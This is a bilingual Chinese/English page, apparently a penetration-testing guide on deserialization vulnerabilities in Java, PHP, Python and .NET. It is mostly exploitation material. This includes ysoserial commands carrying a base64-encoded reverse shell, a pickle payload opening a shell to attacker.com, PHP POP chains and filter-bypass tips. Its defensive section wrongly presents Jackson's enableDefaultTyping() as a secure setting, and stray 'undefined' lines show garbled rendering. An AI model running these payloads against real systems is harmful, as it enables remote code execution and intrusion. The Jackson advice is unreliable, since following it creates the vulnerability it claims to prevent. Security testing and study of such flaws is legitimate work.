Back to Details

deserialization-testing

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

反序列化漏洞测试

Deserialization Vulnerability Testing

概述

Overview

反序列化漏洞是一种利用应用程序反序列化不可信数据导致的漏洞,可能导致远程代码执行、拒绝服务等。本技能提供反序列化漏洞的检测、利用和防护方法。
Deserialization vulnerabilities are flaws caused by applications deserializing untrusted data, which can lead to remote code execution, denial of service, and other issues. This skill provides methods for detecting, exploiting, and defending against deserialization vulnerabilities.

漏洞原理

Vulnerability Principle

应用程序将序列化的数据反序列化为对象时,如果数据来源不可信,攻击者可以构造恶意序列化数据,在反序列化过程中执行任意代码。
When an application deserializes serialized data into objects, if the data comes from an untrusted source, an attacker can construct malicious serialized data to execute arbitrary code during the deserialization process.

常见格式

Common Formats

Java

Java

常见库:
  • Java原生序列化
  • Jackson
  • Fastjson
  • XStream
  • Apache Commons Collections
Common Libraries:
  • Java Native Serialization
  • Jackson
  • Fastjson
  • XStream
  • Apache Commons Collections

PHP

PHP

常见函数:
  • unserialize()
  • json_decode()
Common Functions:
  • unserialize()
  • json_decode()

Python

Python

常见模块:
  • pickle
  • yaml
  • json
Common Modules:
  • pickle
  • yaml
  • json

.NET

.NET

常见类:
  • BinaryFormatter
  • SoapFormatter
  • DataContractSerializer
Common Classes:
  • BinaryFormatter
  • SoapFormatter
  • DataContractSerializer

测试方法

Testing Methods

1. 识别序列化数据

1. Identify Serialized Data

Java序列化特征:
AC ED 00 05 (十六进制)
rO0 (Base64)
PHP序列化特征:
O:8:"stdClass"
a:2:{s:4:"test";s:4:"data";}
Python pickle特征:
\x80\x03
Java Serialization Features:
AC ED 00 05 (Hexadecimal)
rO0 (Base64)
PHP Serialization Features:
O:8:"stdClass"
a:2:{s:4:"test";s:4:"data";}
Python pickle Features:
\x80\x03

2. 检测反序列化点

2. Detect Deserialization Points

常见位置:
  • Cookie值
  • Session数据
  • API参数
  • 文件上传
  • 缓存数据
  • 消息队列
Common Locations:
  • Cookie values
  • Session data
  • API parameters
  • File uploads
  • Cache data
  • Message queues

3. Java反序列化

3. Java Deserialization

Apache Commons Collections利用:
java
// 使用ysoserial生成Payload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
常见Gadget链:
  • CommonsCollections1-7
  • Spring1-2
  • ROME
  • Jdk7u21
Apache Commons Collections Exploitation:
java
// Use ysoserial to generate Payload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
Common Gadget Chains:
  • CommonsCollections1-7
  • Spring1-2
  • ROME
  • Jdk7u21

4. PHP反序列化

4. PHP Deserialization

基础测试:
php
<?php
class Test {
    public $cmd = "id";
    function __destruct() {
        system($this->cmd);
    }
}
echo serialize(new Test());
// O:4:"Test":1:{s:3:"cmd";s:2:"id";}
?>
魔术方法利用:
  • __destruct()
  • __wakeup()
  • __toString()
  • __call()
Basic Testing:
php
<?php
class Test {
    public $cmd = "id";
    function __destruct() {
        system($this->cmd);
    }
}
echo serialize(new Test());
// O:4:"Test":1:{s:3:"cmd";s:2:"id";}
?>
Magic Method Exploitation:
  • __destruct()
  • __wakeup()
  • __toString()
  • __call()

5. Python pickle

5. Python pickle

基础测试:
python
import pickle
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('id',))

pickle.dumps(RCE())
Basic Testing:
python
import pickle
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('id',))

pickle.dumps(RCE())

利用技术

Exploitation Techniques

Java RCE

Java RCE

使用ysoserial:
bash
undefined
Using ysoserial:
bash
undefined

生成Payload

Generate Payload

java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin
java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin

Base64编码

Base64 Encoding

base64 -w 0 payload.bin

**手动构造:**
```java
// 使用Gadget链构造恶意对象
// 参考ysoserial源码
base64 -w 0 payload.bin

**Manual Construction:**
```java
// Construct malicious objects using Gadget chains
// Refer to ysoserial source code

PHP RCE

PHP RCE

利用POP链:
php
<?php
class A {
    public $b;
    function __destruct() {
        $this->b->test();
    }
}

class B {
    public $c;
    function test() {
        call_user_func($this->c, "id");
    }
}

$a = new A();
$a->b = new B();
$a->b->c = "system";
echo serialize($a);
?>
Exploiting POP Chains:
php
<?php
class A {
    public $b;
    function __destruct() {
        $this->b->test();
    }
}

class B {
    public $c;
    function test() {
        call_user_func($this->c, "id");
    }
}

$a = new A();
$a->b = new B();
$a->b->c = "system";
echo serialize($a);
?>

Python RCE

Python RCE

Pickle RCE:
python
import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/attacker.com/4444 0>&1',))

payload = pickle.dumps(RCE())
print(base64.b64encode(payload))
Pickle RCE:
python
import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/attacker.com/4444 0>&1',))

payload = pickle.dumps(RCE())
print(base64.b64encode(payload))

绕过技术

Bypass Techniques

编码绕过

Encoding Bypass

Base64编码:
原始: rO0ABXNy...
编码: ck8wQUJYTnk...
URL编码:
%72%4F%00%AB...
Base64 Encoding:
Original: rO0ABXNy...
Encoded: ck8wQUJYTnk...
URL Encoding:
%72%4F%00%AB...

过滤器绕过

Filter Bypass

使用不同Gadget链:
  • 如果CommonsCollections被过滤,尝试Spring
  • 如果某个版本被过滤,尝试其他版本
Using Different Gadget Chains:
  • If CommonsCollections is filtered, try Spring
  • If a certain version is filtered, try other versions

类名混淆

Class Name Obfuscation

使用反射:
java
Class.forName("java.lang.Runtime").getMethod("exec", String.class)
Using Reflection:
java
Class.forName("java.lang.Runtime").getMethod("exec", String.class)

工具使用

Tool Usage

ysoserial

ysoserial

bash
undefined
bash
undefined

列出可用Gadget

List available Gadgets

java -jar ysoserial.jar
java -jar ysoserial.jar

生成Payload

Generate Payload

java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin

生成Base64

Generate Base64

java -jar ysoserial.jar CommonsCollections1 "command" | base64
undefined
java -jar ysoserial.jar CommonsCollections1 "command" | base64
undefined

PHPGGC

PHPGGC

bash
undefined
bash
undefined

列出可用Gadget

List available Gadgets

./phpggc -l
./phpggc -l

生成Payload

Generate Payload

./phpggc Monolog/RCE1 system id
./phpggc Monolog/RCE1 system id

生成编码Payload

Generate Encoded Payload

./phpggc -b Monolog/RCE1 system id
undefined
./phpggc -b Monolog/RCE1 system id
undefined

Burp Suite

Burp Suite

  1. 拦截包含序列化数据的请求
  2. 使用插件生成Payload
  3. 替换原始数据
  4. 观察响应
  1. Intercept requests containing serialized data
  2. Use plugins to generate Payloads
  3. Replace original data
  4. Observe responses

验证和报告

Verification and Reporting

验证步骤

Verification Steps

  1. 确认可以控制序列化数据
  2. 验证反序列化触发代码执行
  3. 评估影响(RCE、数据泄露等)
  4. 记录完整的POC
  1. Confirm control over serialized data
  2. Verify that deserialization triggers code execution
  3. Assess impact (RCE, data leakage, etc.)
  4. Record complete POC

报告要点

Key Reporting Points

  • 漏洞位置和序列化数据格式
  • 使用的Gadget链或利用方式
  • 完整的利用步骤和PoC
  • 修复建议(输入验证、使用安全序列化等)
  • Vulnerability location and serialized data format
  • Gadget chain or exploitation method used
  • Complete exploitation steps and PoC
  • Fix recommendations (input validation, use secure serialization, etc.)

防护措施

Defensive Measures

推荐方案

Recommended Solutions

  1. 避免反序列化不可信数据
    • 使用JSON替代
    • 使用安全的序列化格式
  2. 输入验证
    java
    // 白名单验证类名
private static final Set<String> ALLOWED_CLASSES = 
    Set.of("com.example.SafeClass");

private Object readObject(ObjectInputStream ois) {
    // 验证类名
    // ...
}
  3. 使用安全配置
    java
    // Jackson配置
objectMapper.enableDefaultTyping();
objectMapper.setVisibility(PropertyAccessor.FIELD, 
    JsonAutoDetect.Visibility.ANY);
  4. 类加载器隔离
    • 使用自定义ClassLoader
    • 限制可加载的类
  5. 监控和日志
    • 记录反序列化操作
    • 监控异常行为
  1. Avoid deserializing untrusted data
    • Use JSON instead
    • Use secure serialization formats
  2. Input Validation
    java
    // Whitelist validation for class names
private static final Set<String> ALLOWED_CLASSES = 
    Set.of("com.example.SafeClass");

private Object readObject(ObjectInputStream ois) {
    // Validate class name
    // ...
}
  3. Use Secure Configurations
    java
    // Jackson configuration
objectMapper.enableDefaultTyping();
objectMapper.setVisibility(PropertyAccessor.FIELD, 
    JsonAutoDetect.Visibility.ANY);
  4. ClassLoader Isolation
    • Use custom ClassLoader
    • Restrict loadable classes
  5. Monitoring and Logging
    • Record deserialization operations
    • Monitor abnormal behavior

注意事项

Notes

  • 仅在授权测试环境中进行
  • 注意不同版本库的Gadget链差异
  • 测试时注意Payload大小限制
  • 了解目标应用的依赖库版本
  • Only perform in authorized testing environments
  • Note differences in Gadget chains across library versions
  • Pay attention to payload size limits during testing
  • Understand the dependency library versions of the target application